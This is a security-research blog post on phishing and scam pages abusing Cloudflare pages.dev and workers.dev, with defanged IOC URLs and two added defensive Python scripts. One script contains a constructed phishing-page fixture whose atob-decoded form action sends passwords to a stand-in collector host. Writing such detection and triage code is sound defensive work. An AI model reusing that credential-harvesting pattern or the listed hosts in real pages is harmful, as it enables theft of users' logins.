SpiderLabs Blog

It’s Raining Phish and Scams – How Cloudflare Pages.dev and Workers.dev Domains Get Abused

Written by Karla Agregado | Jul 11, 2023 1:22:00 PM

As they say, when it rains, it pours. Recently, we observed more than 3,000 phishing emails containing phishing URLs hosted on workers.dev and pages.dev domains.

What is .dev Top Level Domain (TLD)?

The .dev top-level domain is operated by Google. The whole TLD is included in the HTTP Strict Transport Security (HSTS) preload list, so browsers that ship the list require HTTPS for every .dev domain without the site owner having to enlist individually. A side effect worth noting: even a link written with http://, like the one in Figure 2, is upgraded to HTTPS in such a browser, which gives the phishing page a valid certificate and padlock for free.

Cloudflare Pages vs Workers

Both pages.dev and workers.dev are part of Cloudflare's web development and hosting services. Even though both offer web development services under Cloudflare, there are some significant differences between them.

In Cloudflare Pages, developers deploy a project by connecting a Git provider, while Cloudflare Workers provides a serverless execution environment. With workers.dev, you build your page locally and deploy it from your own environment.

Comparing the two services, even with the free tier offered on workers.dev, pages.dev appears to be the more abused domain, probably because of the convenience of deploying straight from a Git provider such as GitHub.

Abused Cloudflare Domains in Phishing Emails

As mentioned earlier, we observed a large number of phishing emails containing URLs on the pages.dev or workers.dev domains. Most of them impersonate different companies and use alarming subjects about payment details, voicemails, pending inquiries and the like. Some of the *.pages.dev URLs in these emails serve only as a redirector, while others host the actual phishing page.

Phishing email mimicking financial services company:

Figure 1. The email header containing a spoofed From address pretending to be from Westpac

Figure 1.1 Email body containing details about a payment supposedly made through Westpac

The email body also contains a phishing link on the pages.dev domain that carries the recipient's email address in the URL query string (the email= parameter), so the landing page can pre-fill the victim's identity.

Figure 2. Screenshot of the actual phishing URL hxxp://a211a49a8bb35[.]pages[.]dev/?email={email address}

Phishing email with URL redirection:

Figure 3. The email header contains a malicious mailer[.]php path in the X-PHP-Script header

The mailer script sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php was used to compose and send the phishing email to the recipient.

Figure 3.1 Screenshot of sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php

However, the domain sondakikatokathaberleri[.]name[.]tr seems to be a WordPress site still under construction.

Figure 3.2 Screenshot of sondakikatokathaberleri[.]name[.]tr

Figure 4. The email body, which asks the recipient to update their account

The email body contains a clickable link whose real target is hxxps://3f303073[.]45564355zezdfxc56e667[.]pages[.]dev/qrdcxw52463f86302yh72-fe4367z. That pages.dev page holds only JavaScript that redirects the browser to hxxps://helpsana[.]ro/wp-hash/1/index4[.]php, which is the actual phishing page.

Figure 4.1 Screenshot of the source code of the URL containing phishing redirection

Figure 4.2 Screenshot of the phishing URL hxxps://helpsana[.]ro/wp-hash/1/index4[.]php

Other Phishing URLs with Cloudflare Pages and Workers

A pages.dev phishing URL targeting Microsoft was also seen. Its source code calls the atob function on a variable holding a Base64 string. atob decodes Base64 back into the original text at run time, so the sensitive strings never appear in clear in the page source.

Figure 5. Screenshot of the actual phishing URL hxxps://1-d0asfasfjhasfa7979352jhasf.pages[.]dev/

When the Base64 string is decoded, it yields the URL hxxps://tutu57tututut[.]000webhostapp[.]com/don[.]php, the endpoint where the stolen credentials are sent and stored.

Figure 5.1 Screenshot of the source code with usage of variable ‘olafatob’

Below is another sample, this time a phishing URL on the workers.dev domain targeting Dropbox. The page uses the same atob-based decoding and obfuscation technique.

Figure 6. Screenshot of the phishing URL hxxps://ancient-salad-4674.mmrctliacetgliue504[.]workers[.]dev/87c03eda-fdd4-4125-bf73-1b161178699a

Figure 7. Screenshot of the encoded source code and usage of atob function
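The atob trick in Figures 5 and 7 is cheap to undo statically: anything the browser can decode, an analyst can decode too. The following is an added example (my own code, not from the post or from the phishing kits it describes) that pulls Base64-looking string literals out of a captured page, decodes them, and separates any recovered URLs that point away from the host serving the page, which is exactly where the credential collector or the next redirect hides. The sample page and its .invalid hostnames are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample of a phishing landing page that hides its URLs the way the
# pages described above do: Base64 literals decoded with atob() at run time.
# The hostnames are placeholders (.invalid), not real indicators.
EXFIL_URL = "https://collector.example.invalid/don.php"
REDIRECT_URL = "https://redirect.example.invalid/index4.php"


def _b64(text: str) -> str:
    # Used only to build the sample so the fixture stays self-consistent.
    return base64.b64encode(text.encode()).decode()


SAMPLE_PAGE = """
<html><body>
<form id="f" method="post"><input name="pw" type="password"></form>
<script>
var olafatob = "%s";
document.getElementById("f").action = atob(olafatob);
var next = "%s";
setTimeout(function () { window.location.href = atob(next); }, 10);
</script>
</body></html>
""" % (_b64(EXFIL_URL), _b64(REDIRECT_URL))

# Quoted string literals that look like Base64: 16+ alphabet chars, optional padding.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def decode_b64(candidate: str):
    """Decode a Base64 candidate to text, or return None if it is not valid
    Base64 or does not decode to UTF-8. Random-looking path tokens such as
    qrdcxw52463f86302yh72-fe4367z fail one of these checks and are ignored."""
    padded = candidate + "=" * (-len(candidate) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def triage_page(page: str, hosted_on: str) -> dict:
    """Static look at a captured page: recover URLs hidden in Base64 literals and
    list the hosts that differ from the one serving the page (exfil/redirect)."""
    hidden = []
    for literal in B64_LITERAL.findall(page):
        text = decode_b64(literal)
        if text is None:
            continue
        hidden.extend(URL_RE.findall(text))
    hosts = {urlparse(u).hostname for u in hidden}
    offsite = sorted(h for h in hosts if h and h != hosted_on.lower())
    return {
        "uses_atob": "atob(" in page,   # decoding is deferred to the browser
        "hidden_urls": hidden,
        "offsite_hosts": offsite,
    }


if __name__ == "__main__":
    report = triage_page(SAMPLE_PAGE, "1-d0asfasfjhasfa7979352jhasf.pages.dev")
    for key, value in report.items():
        print(key, value)
```

The decoder deliberately requires strict Base64 (validate=True) and a clean UTF-8 result; without both checks, hashed identifiers like the ones in the pages.dev and workers.dev URLs above produce garbage "hits". Run it over the saved HTML of a suspicious page and feed offsite_hosts into your blocklist or takedown request.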

Cloudflare Pages and Workers in VirusTotal

Looking beyond our own email telemetry, over a 90-day period we found at least 60,000 URLs on the workers.dev domain in VirusTotal, the majority of them used in phishing activity.

Figure 8. Screenshot of a sample of URLs queried in VirusTotal with workers.dev

Meanwhile, at least 65,000 pages.dev URLs were seen over the same 90 days. More than 11,000 of them were related to scams or fake news, and at the time of the query they were being flagged only by Trustwave:

Figure 9. Screenshot of the URLs query in VirusTotal

Figure 10. Screenshot of the fake news site

These scam URLs use keywords such as cash, money or job in the hostname, followed by one to three digits, and the pages often contain links that redirect to yet another scam site.

Figure 11. Screenshot of the sample redirection to another scam URL
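Three signals from this post combine into a useful mail-gateway check: a link on a free Cloudflare hostname (pages.dev or workers.dev), a hostname label that follows the keyword-plus-digits scam pattern, and the recipient's own address embedded in the link as in Figure 2. The following is an added example (my own code, not Trustwave's or Cloudflare's) that extracts URLs from a message body, refangs them, classifies the host, and produces a verdict per link. It assumes Cloudflare's usual naming (<project>.pages.dev, <hash>.<project>.pages.dev for preview deployments, <worker>.<account>.workers.dev); the keyword list and the score weights are assumptions to tune from your own telemetry, and the sample email, apart from the IOC hostnames from this post, is constructed with .invalid placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample email body (not a real capture). Hosts that are not from
# the IOC list in this post are .invalid placeholders. Links are defanged the
# way the post writes them, so triage starts by refanging.
SAMPLE_EMAIL = """\
Subject: Payment notification - action required

A payment was processed today. Review the transaction here:
hxxp://a211a49a8bb35[.]pages[.]dev/?email=victim@example.invalid

Earn from home: hxxps://safe-cash90.pages[.]dev/
Your document: hxxps://3f303073[.]45564355zezdfxc56e667[.]pages.dev/qrdcxw52463f86302yh72-fe4367z
Shared file: hxxps://ancient-salad-4674.mmrctliacetgliue504[.]workers[.]dev/87c03eda-fdd4-4125-bf73-1b161178699a
Unsubscribe: https://newsletter.example.invalid/unsub?email=victim@example.invalid
"""

URL_RE = re.compile(r'https?://[^\s<>"\']+')
# Hostname label shaped like <anything><cash|money|job><anything><1-3 digits>,
# generalised from the IOC samples (safe-cash90, cashgraber173, flexjobs-10, ...).
# The keyword list is an assumption; extend it from what you see in the wild.
SCAM_LABEL = re.compile(r'^[a-z0-9-]*(cash|money|job)[a-z-]*\d{1,3}$')
# Assumed weights: a scam-shaped name alone is enough to block, the others need company.
WEIGHTS = {"free-hosting": 1, "scam-name-pattern": 2, "recipient-in-url": 1}


def refang(text: str) -> str:
    return text.replace("hxxp", "http").replace("[.]", ".")


def classify_host(host: str):
    """Map a hostname to (service, project). Assumes Cloudflare's naming:
    <project>.pages.dev or <hash>.<project>.pages.dev for preview deployments,
    and <worker>.<account>.workers.dev."""
    labels = host.lower().split(".")
    if len(labels) >= 3 and labels[-2:] == ["pages", "dev"]:
        return "pages", labels[-3]
    if len(labels) >= 3 and labels[-2:] == ["workers", "dev"]:
        return "workers", labels[0]
    return "other", None


def triage_email(body: str, recipient: str) -> list:
    """One record per URL in the body: host, Cloudflare project/worker name,
    the flags that fired and a verdict (allow / review / block)."""
    records = []
    for url in URL_RE.findall(refang(body)):
        host = urlparse(url).hostname or ""
        service, project = classify_host(host)
        flags = []
        if service != "other":
            flags.append("free-hosting")
        if project and SCAM_LABEL.match(project):
            flags.append("scam-name-pattern")
        if recipient.lower() in url.lower():
            flags.append("recipient-in-url")   # victim pre-identified in the link
        score = sum(WEIGHTS[f] for f in flags)
        verdict = "block" if score >= 2 else "review" if score == 1 else "allow"
        records.append({"url": url, "host": host, "service": service,
                        "project": project, "flags": flags, "verdict": verdict})
    return records


if __name__ == "__main__":
    for rec in triage_email(SAMPLE_EMAIL, "victim@example.invalid"):
        print(rec["verdict"], rec["host"], rec["flags"])
```

Note why the legitimate-looking unsubscribe link only lands in "review": an address in the query string is normal for mailing lists, so that signal is only damning in combination with free hosting. Extracting the project or worker name also gives you something stable to pivot on, since one abused project serves many preview hashes.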

As of this writing, some of the scam or phishing URLs have already been taken down by Cloudflare due to malicious activity.

Conclusion

We are seeing a huge number of phishing and scam pages abusing these Cloudflare .dev services, and some phishers use the free hosting at scale. Be very wary of pages.dev and workers.dev links that arrive by email. Most of the phishing and scam pages we see rely on redirection or on encoded strings in the page content to avoid easy detection by AV products. Trustwave MailMarshal has protections for these campaigns.

Staying vigilant and keeping up with the latest threats remains the best defence against falling victim to phishing and scams like these.

IOCs

URLs

hxxp://a211a49a8bb35[.]pages[.]dev/

hxxps://3f303073[.]45564355zezdfxc56e667[.]pages.dev/qrdcxw52463f86302yh72-fe4367z

hxxps://helpsana[.]ro/wp-hash/1/index4[.]php

hxxps://tutu57tututut[.]000webhostapp[.]com/don[.]php

hxxps://1-d0asfasfjhasfa7979352jhasf.pages[.]dev/

hxxps://ancient-salad-4674.mmrctliacetgliue504[.]workers[.]dev/87c03eda-fdd4-4125-bf73-1b161178699a

sondakikatokathaberleri[.]name[.]tr/hash/demo/mailer.php

Some Samples of Scam or Fake News URLs with a Common Domain Format

hxxps://flexjobs-10.pages[.]dev/

hxxps://safe-cash90.pages[.]dev/

hxxps://safe-cash98.pages[.]dev/

hxxps://net-cash375.pages[.]dev/

hxxps://cashgraber173.pages[.]dev/

hxxps://cash-hub4.pages[.]dev/

hxxps://moneypro105.pages[.]dev/
